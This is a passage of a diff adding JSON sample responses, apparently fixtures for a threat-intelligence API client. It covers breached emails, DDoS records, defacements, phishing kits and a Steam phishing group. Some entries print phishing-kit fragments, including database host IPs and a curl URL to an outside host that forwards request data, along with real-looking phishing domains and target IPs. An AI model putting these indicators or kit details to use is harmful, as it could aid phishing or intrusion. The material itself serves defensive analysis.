"seqUpdate", + "cnc_domain", + "cnc_domain.tree", + "cnc_ip", + "notification_id" + ], + "fields": [ + "account", + "type", + "operator", + "threat_actor", + "severity", + "source", + "malware", + "id", + "seqUpdate", + "domain", + "domain.tree", + "ip", + "cnc_domain", + "cnc_domain.tree", + "cnc_ip" + ], + "sorts": [ + "date_add", + "seqUpdate" + ] + } + }, + "seqUpdate": 1454699133295 + }, + "compromised/breached":{ + "resultId": "3b87b3624d57ef2591f2a926ce25036832c347a3", + "count": 1746463257, + "items": [ + { + "addInfo": { + "emailDomain": [ + "mail.com" + ], + "updateTimestampLong": [ + 1727736313973637 + ] + }, + "description": null, + "downloadLinkList": [], + "email": [ + "example.user.04@mail.com" + ], + "evaluation": { + "admiraltyCode": "C3", + "credibility": 50, + "reliability": 50, + "severity": "green", + "tlp": "amber", + "ttl": null + }, + "id": "70b0f7b160866f3a5a351413ce898065", + "leakName": "Email collection", + "leakPublished": "21.09.2024", + "password": [], + "reaperMessageId": null, + "taName": [], + "updateTime": "2024-10-01T01:45:13", + "uploadTime": "2024-10-01T01:45:13" + }, + { + "addInfo": { + "emailDomain": [ + "exampledomain.cz" + ], + "updateTimestampLong": [ + 1727736313995465 + ] + }, + "description": null, + "downloadLinkList": [], + "email": [ + "startuser@exampledomain.cz" + ], + "evaluation": { + "admiraltyCode": "C3", + "credibility": 50, + "reliability": 50, + "severity": "green", + "tlp": "amber", + "ttl": null + }, + "id": "b2f3b1500376d13c0a74611dd2c95119", + "leakName": "Email collection", + "leakPublished": "21.09.2024", + "password": [], + "reaperMessageId": null, + "taName": [], + "updateTime": "2024-10-01T01:45:13", + "uploadTime": "2024-10-01T01:45:13" + }, + { + "addInfo": { + "emailDomain": [ + "example.fr" + ], + "updateTimestampLong": [ + 1727736314011414 + ] + }, + "description": null, + "downloadLinkList": [], + "email": [ + "useeeerexample@example.fr" + ], + "evaluation": { + "admiraltyCode": "C3", + "credibility": 50, + "reliability": 50, + "severity": "green", + "tlp": "amber", + "ttl": null + }, + "id": "71a122a99b3925ef8b8f225d2ac76fa8", + "leakName": "Email collection", + "leakPublished": "21.09.2024", + "password": [], + "reaperMessageId": null, + "taName": [], + "updateTime": "2024-10-01T01:45:14", + "uploadTime": "2024-10-01T01:45:14" + } + ] + }, + "attacks/ddos":{ + "count": 44739317, + "items": [ + { + "id": "7927ec532db08b2e420b33cff2a9068ca8487e76", + "cnc": { + "cnc": "6lxdx.s3.amazonaws.com", + "port": null, + "domain": "6lxdx.s3.amazonaws.com", + "ipv4": null, + "ipv6": null, + "url": "http://6lxdx.s3.amazonaws.com" + }, + "dateBegin": "2019-10-23T05:34:25+00:00", + "dateEnd": "2019-10-23T05:35:16+00:00", + "dateReg": "2019-10-23T00:00:00+00:00", + "malware": null, + "evaluation": { + "admiraltyCode": "C2", + "credibility": 70, + "reliability": 60, + "severity": "orange", + "tlp": "green", + "ttl": 30 + }, + "messageLink": null, + "oldId": "192868705", + "duration": 51, + "protocol": "udp", + "seqUpdate": 1677065083, + "source": "honeypot_logs:1", + "sourceRowId": "11054565", + "stixGuid": "9232056c-0c7d-21a7-ac4f-a7fa243adc57", + "target": { + "ipv4": { + "asn": null, + "city": "Fairfield", + "region": "Connecticut", + "provider": "Amazon.com", + "countryCode": "US", + "countryName": "United States", + "ip": "3.15.14.164" + }, + "url": null, + "category": null, + "domainsCount": 0, + "port": 5353, + "domain": null + }, + "threatActor": null, + "requestData": { + "link": null, + "headers": {}, + "headersHash": null, + "body": null, + "bodyHash": null + }, + "type": "DNS Reflection", + "displayOptions": { + "isHidden": false, + "isFavourite": false + } + }, + { + "id": "695e81a7379155c4c3da31056675a3f2073dd931", + "cnc": { + "cnc": "6lmqc.s3.amazonaws.com", + "port": null, + "domain": "6lmqc.s3.amazonaws.com", + "ipv4": null, + "ipv6": null, + "url": "http://6lmqc.s3.amazonaws.com" + }, + "dateBegin": "2019-10-23T05:34:25+00:00", + "dateEnd": "2019-10-23T05:35:16+00:00", + "dateReg": "2019-10-23T00:00:00+00:00", + "malware": null, + "evaluation": { + "admiraltyCode": "C2", + "credibility": 70, + "reliability": 60, + "severity": "orange", + "tlp": "green", + "ttl": 30 + }, + "messageLink": null, + "oldId": "192868443", + "duration": 51, + "protocol": "udp", + "seqUpdate": 1677065083, + "source": "honeypot_logs:1", + "sourceRowId": "11058245", + "stixGuid": "6f0a316c-1c50-455b-b9e6-633aa24f7498", + "target": { + "ipv4": { + "asn": null, + "city": "Fairfield", + "region": "Connecticut", + "provider": "Amazon.com", + "countryCode": "US", + "countryName": "United States", + "ip": "3.15.14.164" + }, + "url": null, + "category": null, + "domainsCount": 0, + "port": 5353, + "domain": null + }, + "threatActor": null, + "requestData": { + "link": null, + "headers": {}, + "headersHash": null, + "body": null, + "bodyHash": null + }, + "type": "DNS Reflection", + "displayOptions": { + "isHidden": false, + "isFavourite": false + } + }, + { + "id": "c5202c7177455777c702529a72a0f5a613c2c58a", + "cnc": { + "cnc": "plk4l.s3.amazonaws.co", + "port": null, + "domain": "plk4l.s3.amazonaws.co", + "ipv4": null, + "ipv6": null, + "url": "http://plk4l.s3.amazonaws.co" + }, + "dateBegin": "2019-10-22T22:33:35+00:00", + "dateEnd": "2019-10-22T22:34:49+00:00", + "dateReg": "2019-10-23T00:00:00+00:00", + "malware": null, + "evaluation": { + "admiraltyCode": "C2", + "credibility": 70, + "reliability": 60, + "severity": "orange", + "tlp": "green", + "ttl": 30 + }, + "messageLink": null, + "oldId": "192838071", + "duration": 74, + "protocol": "udp", + "seqUpdate": 1677065083, + "source": "honeypot_logs:1", + "sourceRowId": "11015631", + "stixGuid": "eb0e8ebf-f24b-7063-7702-1146335bb591", + "target": { + "ipv4": { + "asn": null, + "city": null, + "region": null, + "provider": "Amazon.com", + "countryCode": "US", + "countryName": "United States", + "ip": "18.191.111.103" + }, + "url": null, + "category": null, + "domainsCount": 0, + "port": 5353, + "domain": null + }, + "threatActor": null, + "requestData": { + "link": null, + "headers": {}, + "headersHash": null, + "body": null, + "bodyHash": null + }, + "type": "DNS Reflection", + "displayOptions": { + "isHidden": false, + "isFavourite": false + } + } + ], + "settings": { + "search": { + "tags": [ + "target_ip_country_name", + "target_category", + "cnc_ip_country_name", + "malware", + "cybercrime_new", + "cybercrime", + "threat_actor", + "company", + "company_id", + "type", + "options", + "target_ip", + "target_domain", + "id", + "source" + ], + "fields": [ + "target_ip", + "ip", + "target_domain", + "domain", + "target_domain.tree", + "target_ip_country_name", + "target_category", + "cnc_ip", + "cnc_ip_country_name", + "malware", + "type", + "cybercrime", + "cybercrime_new", + "threat_actor", + "seqUpdate", + "source", + "id" + ], + "sorts": [ + "last_seen", + "date_reg", + "seqUpdate" + ] + } + }, + "seqUpdate": 1677065083 + }, + "attacks/deface":{ + "count": 17197503, + "items": [ + { + "contacts": [], + "date": "2016-04-26T05:42:48Z", + "evaluation": { + "admiraltyCode": "B2", + "credibility": 80, + "reliability": 80, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "59695fabb1965600014bae7b", + "mirrorLink": "https://deface.ti-files.com/id:-59695fabb1965600014bae7b:", + "portalLink": "https://tap-stage.ci-kuber.gibdev.net/attacks/deface?searchValue=id:59695fabb1965600014bae7b", + "providerDomain": "defacer.id", + "seqUpdate": 1508430053029213, + "siteUrl": "http://med-supplies.de/?sky008", + "source": "defacer.id", + "targetDomain": "med-supplies.de", + "targetDomainProvider": null, + "targetIp": { + "asn": "AS25504", + "city": null, + "countryCode": "DE", + "countryName": "Germany", + "ip": "89.200.168.133", + "provider": "Vautron Rechenzentrum AG", + "region": "Europe" + }, + "threatActor": { + "country": null, + "id": "9c94863e3602876b5e0150a7cbb926dda6556e03", + "isAPT": false, + "name": "Sky008", + "stixGuid": null + }, + "tsCreate": "2016-04-26T05:42:48Z", + "url": "http://med-supplies.de/?sky008" + }, + { + "contacts": [], + "date": "2016-04-26T11:27:37Z", + "evaluation": { + "admiraltyCode": "B2", + "credibility": 80, + "reliability": 80, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "59695f29b1965600014badf1", + "mirrorLink": "https://deface.ti-files.com/id:-59695f29b1965600014badf1:", + "portalLink": "https://tap-stage.ci-kuber.gibdev.net/attacks/deface?searchValue=id:59695f29b1965600014badf1", + "providerDomain": "defacer.id", + "seqUpdate": 1508430053047578, + "siteUrl": "http://www.distribuidora.com.mx/?sky008", + "source": "defacer.id", + "targetDomain": "www.distribuidora.com.mx", + "targetDomainProvider": null, + "targetIp": { + "asn": "AS36444", + "city": null, + "countryCode": "US", + "countryName": "United States", + "ip": "192.240.166.56", + "provider": "NEXCESS-NET", + "region": "North America" + }, + "threatActor": { + "country": null, + "id": "9c94863e3602876b5e0150a7cbb926dda6556e03", + "isAPT": false, + "name": "Sky008", + "stixGuid": null + }, + "tsCreate": "2016-04-26T11:27:37Z", + "url": "http://www.distribuidora.com.mx/?sky008" + }, + { + "contacts": [], + "date": "2016-04-26T11:18:28Z", + "evaluation": { + "admiraltyCode": "B2", + "credibility": 80, + "reliability": 80, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "59695f1ab1965600014bade5", + "mirrorLink": "https://deface.ti-files.com/id:-59695f1ab1965600014bade5:", + "portalLink": "https://tap-stage.ci-kuber.gibdev.net/attacks/deface?searchValue=id:59695f1ab1965600014bade5", + "providerDomain": "defacer.id", + "seqUpdate": 1508430053049467, + "siteUrl": "http://petplanetshop.com.ar/api.php?sky008", + "source": "defacer.id", + "targetDomain": "petplanetshop.com.ar", + "targetDomainProvider": null, + "targetIp": { + "asn": "AS7303", + "city": "Rosario", + "countryCode": "AR", + "countryName": "Argentina", + "ip": "181.88.192.28", + "provider": "Telecom Argentina S.A.", + "region": "South America" + }, + "threatActor": { + "country": null, + "id": "9c94863e3602876b5e0150a7cbb926dda6556e03", + "isAPT": false, + "name": "Sky008", + "stixGuid": null + }, + "tsCreate": "2016-04-26T11:18:28Z", + "url": "http://petplanetshop.com.ar/api.php?sky008" + } + ], + "seqUpdate": 1508430053049467 + }, + "attacks/phishing_kit":{ + "count": 122834, + "items": [ + { + "id": "5cf5afc22dfa08252e990c9e3fc51e287ff54dc53742767a7428dc31b25dd606", + "hash": "5cf5afc22dfa08252e990c9e3fc51e287ff54dc53742767a7428dc31b25dd606", + "seqUpdate": 1523520752839, + "dateDetected": "2018-03-09T22:19:59+00:00", + "dateFirstSeen": "2018-03-09T22:19:59+00:00", + "dateLastSeen": "2018-03-27T13:18:38+00:00", + "downloadedFrom": [ + { + "date": "2018-03-09T22:19:59+03:00", + "url": "https://gt-mywyty186338.codeanyapp.com/cb.zip", + "phishingUrl": "", + "domain": "gt-mywyty186338.codeanyapp.com", + "fileName": "" + } + ], + "emails": [], + "login": "PhishingKitFetcher", + "path": "https://tap.group-ib.com/api/v2/malware/phishing_kit/5cf5afc22dfa08252e990c9e3fc51e287ff54dc53742767a7428dc31b25dd606/file/5cf5afc22dfa08252e990c9e3fc51e287ff54dc53742767a7428dc31b25dd606", + "source": [ + "ci-PhishKit" + ], + "targetBrand": [], + "telegramIds": null, + "variables": [ + { + "type": "DB", + "filePath": "./cb/pages/jsp-ns/cargando.php", + "values": [ + "host: $mysql_host", + "login: ***********", + "password: ***************" + ] + }, + { + "type": "DB", + "filePath": "./cb/pages/jsp-ns/email-notify.php", + "values": [ + "host: 104.196.210.132", + "login: ****", + "password: *************" + ] + }, + { + "type": "DB", + "filePath": "./cb/pages/jsp-ns/index.php", + "values": [ + "host: 104.196.210.132", + "login: ****", + "password: *************" + ] + } + ], + "threatActors": null, + "evaluation": { + "admiraltyCode": "B2", + "credibility": 80, + "reliability": 70, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "isFavourite": false, + "isHidden": false + }, + { + "id": "33b5093d2c5492ee49241bf3fd736a5013081ebc6a7cb4df6b295924e4a73131", + "hash": "33b5093d2c5492ee49241bf3fd736a5013081ebc6a7cb4df6b295924e4a73131", + "seqUpdate": 1523520763952, + "dateDetected": "2018-02-28T00:46:20+00:00", + "dateFirstSeen": "2018-02-28T00:46:20+00:00", + "dateLastSeen": "2018-03-27T13:18:48+00:00", + "downloadedFrom": [], + "emails": [], + "login": "PhishingKitFetcher", + "path": "https://tap.group-ib.com/api/v2/malware/phishing_kit/33b5093d2c5492ee49241bf3fd736a5013081ebc6a7cb4df6b295924e4a73131/file/33b5093d2c5492ee49241bf3fd736a5013081ebc6a7cb4df6b295924e4a73131", + "source": [ + "api" + ], + "targetBrand": [], + "telegramIds": null, + "variables": [ + { + "type": "LOG", + "filePath": "./blnoxxue/blviituer.php", + "values": [ + "path: \"wtuds\" . \"/\" . $_GET[\"altr\"]" + ] + }, + { + "type": "LOG", + "filePath": "./blnoxxue/uogirue.php", + "values": [ + "path: $cache_folder . \"/\" . $_GET[\"altr\"]" + ] + }, + { + "type": "LOG", + "filePath": "./blnoxxue/xbbiyurt.php", + "values": [ + "path: $cache_folder . \"/\" . $_GET[\"altr\"]" + ] + }, + { + "type": "CURL", + "filePath": "./blnoxxue/blviituer.php", + "values": [ + "url: \"http://solfinesew.pw/story2.php?pass=qwerty8&q={$_GET['altr']}\"", + "url: \"https://www.ask.com/web?q={mb_strtolower(str_replace(\" \", \"+\", str_replace(\" \", \"+\", $keyword))_2)}&qo=pagination&qsrc=998&page={$page}\"", + "url: \"http://www.google.com/search?q={mb_strtolower(str_replace(\" \", \"+\", str_replace(\" \", \"+\", $keyword))_2)}&start={$google_n}\"", + "url: \"http://search.yahoo.com/search?p={mb_strtolower(str_replace(\" \", \"+\", str_replace(\" \", \"+\", $keyword))_2)}&fr=yfp-t&fr2=sb-top&fp=1&b={$page}&pz=10&bct=0&xargs=0\"" + ] + }, + { + "type": "CURL", + "filePath": "./blnoxxue/uogirue.php", + "values": [ + "url: \"http://solfinesew.pw/story2.php?pass=qwerty8&q={$_GET['altr']}\"", + "url: \"https://www.ask.com/web?q={mb_strtolower(str_replace(\" \", \"+\", str_replace(\" \", \"+\", $keyword))_2)}&qo=pagination&qsrc=998&page={$page}\"", + "url: \"http://www.google.com/search?q={mb_strtolower(str_replace(\" \", \"+\", str_replace(\" \", \"+\", $keyword))_2)}&start={$google_n}\"", + "url: \"http://search.yahoo.com/search?p={mb_strtolower(str_replace(\" \", \"+\", str_replace(\" \", \"+\", $keyword))_2)}&fr=yfp-t&fr2=sb-top&fp=1&b={$page}&pz=10&bct=0&xargs=0\"" + ] + }, + { + "type": "CURL", + "filePath": "./blnoxxue/xbbiyurt.php", + "values": [ + "url: \"http://solfinesew.pw/story2.php?pass=qwerty8&q={$_GET['altr']}\"", + "url: \"https://www.ask.com/web?q={mb_strtolower(str_replace(\" \", \"+\", str_replace(\" \", \"+\", $keyword))_2)}&qo=pagination&qsrc=998&page={$page}\"", + "url: \"http://www.google.com/search?q={mb_strtolower(str_replace(\" \", \"+\", str_replace(\" \", \"+\", $keyword))_2)}&start={$google_n}\"", + "url: \"http://search.yahoo.com/search?p={mb_strtolower(str_replace(\" \", \"+\", str_replace(\" \", \"+\", $keyword))_2)}&fr=yfp-t&fr2=sb-top&fp=1&b={$page}&pz=10&bct=0&xargs=0\"" + ] + } + ], + "threatActors": null, + "evaluation": { + "admiraltyCode": "B2", + "credibility": 80, + "reliability": 70, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "isFavourite": false, + "isHidden": false + }, + { + "id": "1ff2f4033df6dce75504c808d765889a69f9d9c024893cf02b6f65b48e652f70", + "hash": "1ff2f4033df6dce75504c808d765889a69f9d9c024893cf02b6f65b48e652f70", + "seqUpdate": 1523520767270, + "dateDetected": "2018-02-23T22:40:36+00:00", + "dateFirstSeen": "2018-02-23T22:40:36+00:00", + "dateLastSeen": "2018-03-27T13:18:51+00:00", + "downloadedFrom": [], + "emails": [], + "login": "PhishingKitFetcher", + "path": "https://tap.group-ib.com/api/v2/malware/phishing_kit/1ff2f4033df6dce75504c808d765889a69f9d9c024893cf02b6f65b48e652f70/file/1ff2f4033df6dce75504c808d765889a69f9d9c024893cf02b6f65b48e652f70", + "source": [ + "api" + ], + "targetBrand": [], + "telegramIds": null, + "variables": null, + "threatActors": null, + "evaluation": { + "admiraltyCode": "B2", + "credibility": 80, + "reliability": 70, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "isFavourite": false, + "isHidden": false + } + ], + "settings": { + "search": { + "fields": [ + "company", + "domain", + "has_connection_vars", + "target_brand" + ], + "tags": [ + "203051", + "options", + "target_brand" + ] + } + }, + "seqUpdate": 1523520767270 + }, + "attacks/phishing_group":{ + "count": 8439182, + "items": [ + { + "brand": "Valve Steam", + "countPhishing": 20, + "date": { + "blocked": "2017-12-07T08:37:11+03:00", + "added": "2015-04-30T23:26:52+03:00", + "detected": "2017-10-11T20:36:03+03:00", + "blockedIndexed": null, + "updated": "2021-01-18T14:42:36+03:00" + }, + "domain": "accsteamorigin.sells.com.ua", + "domainInfo": { + "domain": "accsteamorigin.sells.com.ua", + "domainPuny": "accsteamorigin.sells.com.ua", + "expirationDate": null, + "registered": null, + "registrar": null, + "tld": "ua", + "title": "Steam Community", + "category": [] + }, + "domainTitle": "Steam Community", + "evaluation": { + "admiraltyCode": "C3", + "credibility": 50, + "reliability": 50, + "severity": "red", + "tlp": "amber", + "ttl": 0 + }, + "falsePositive": false, + "groupLifetime": 81361, + "id": "f2a145de56f5c3767eaeaa2dc8baff69ed157f4a34659b0611bf2530e3d34257", + "ip": [ + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + } + ], + "objective": [ + "Login harvest" + ], + "phishingKitArray": [], + "screenshot": { + "pageHtml": { + "hashSha256": "h:cfaea13d115982fe593364e5d2a4e47436681010e094eb752a78e92a469ee252", + "filetype": "pageHtml", + "filename": "h:cfaea13d115982fe593364e5d2a4e47436681010e094eb752a78e92a469ee252", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:536691c2f90954d9af264ebb947e5fde4425d91a34157d34518f4f2449e709b1", + "filetype": "pageScreen", + "filename": "s:536691c2f90954d9af264ebb947e5fde4425d91a34157d34518f4f2449e709b1", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "seqUpdate": 1430425612098642, + "signature": { + "resource": [], + "screen": [], + "manual": [ + "Steam_we_see_u" + ] + }, + "source": [ + "SafeSearch" + ], + "status": 1, + "threatActor": { + "id": "", + "name": "", + "nameIndexed": "", + "isAPT": false + }, + "uniqueTitles": [ + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + } + ], + "urlListLink": "", + "whitelist": false, + "phishing": [ + { + "id": "4c6c37c06977d8ba6ea9c3e356af7bbd248a1a6a189b4720c5fcb2d67dbc0254", + "url": "http://accsteamorigin.sells.com.ua/products?sort=default&size=30", + "date": { + "blocked": "2017-11-18T00:40:56+03:00", + "added": "2017-11-10T16:36:54+03:00", + "detected": "2017-11-10T16:36:54+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:afeb54bfc3cf4bd8ea984626ce01742be80c573b876961c1e37786ad86cc5a2a", + "filetype": "pageHtml", + "filename": "h:afeb54bfc3cf4bd8ea984626ce01742be80c573b876961c1e37786ad86cc5a2a", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", + "filetype": "pageScreen", + "filename": "s:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "bce7ef8bfc136d48ffe2888f4d8b9fa9e14640bb5901bdbcfc075e3ac4eeacb7", + "url": "http://accsteamorigin.sells.com.ua/products?size=10&page=4", + "date": { + "blocked": "2017-11-14T08:16:01+03:00", + "added": "2017-11-10T16:36:54+03:00", + "detected": "2017-11-10T16:36:54+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:a28117d088b88babeb5ce148e1f73ce21a93b9d35361b6ac640b6c5633703272", + "filetype": "pageHtml", + "filename": "h:a28117d088b88babeb5ce148e1f73ce21a93b9d35361b6ac640b6c5633703272", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:c18b6529f3bb143a54d0ee96cc4955a7eb7441b7589ac7922d716bb694a0b654", + "filetype": "pageScreen", + "filename": "s:c18b6529f3bb143a54d0ee96cc4955a7eb7441b7589ac7922d716bb694a0b654", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "0f41b79fd897eaf5b6950a09712f3a0c7cc3042389beb813a2f021473bec6726", + "url": "http://accsteamorigin.sells.com.ua/products?page=5&sort=cheap", + "date": { + "blocked": "2017-12-07T08:37:11+03:00", + "added": "2017-11-04T16:38:46+03:00", + "detected": "2017-11-04T16:38:46+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:5ffb301a1ca8ec018bb1f1b3b9999939c8ec584e4784366840e95a749e32fd46", + "filetype": "pageHtml", + "filename": "h:5ffb301a1ca8ec018bb1f1b3b9999939c8ec584e4784366840e95a749e32fd46", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:4bef02ccc066f86a4d0c81fc1150846d7dc49cadcd1b8dc79d07b5759be72896", + "filetype": "pageScreen", + "filename": "s:4bef02ccc066f86a4d0c81fc1150846d7dc49cadcd1b8dc79d07b5759be72896", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "793197298b0240d00fd6717014e0fa30db98f7bf867254124d9a221ff9097fa6", + "url": "http://accsteamorigin.sells.com.ua/products?page=1&sort=cheap", + "date": { + "blocked": "2017-12-07T07:24:00+03:00", + "added": "2017-10-11T23:07:34+03:00", + "detected": "2017-10-11T23:07:34+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:5ffb301a1ca8ec018bb1f1b3b9999939c8ec584e4784366840e95a749e32fd46", + "filetype": "pageHtml", + "filename": "h:5ffb301a1ca8ec018bb1f1b3b9999939c8ec584e4784366840e95a749e32fd46", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:4bef02ccc066f86a4d0c81fc1150846d7dc49cadcd1b8dc79d07b5759be72896", + "filetype": "pageScreen", + "filename": "s:4bef02ccc066f86a4d0c81fc1150846d7dc49cadcd1b8dc79d07b5759be72896", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "52688b4712a11e4266f3acabb80872a69b251ea3484ca7f810dd2ef705947342", + "url": "http://accsteamorigin.sells.com.ua/akkauntyi-origin/c2?sort=expensive&page=1&size=30", + "date": { + "blocked": "2017-12-07T07:23:55+03:00", + "added": "2017-10-11T22:58:59+03:00", + "detected": "2017-10-11T22:58:59+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": 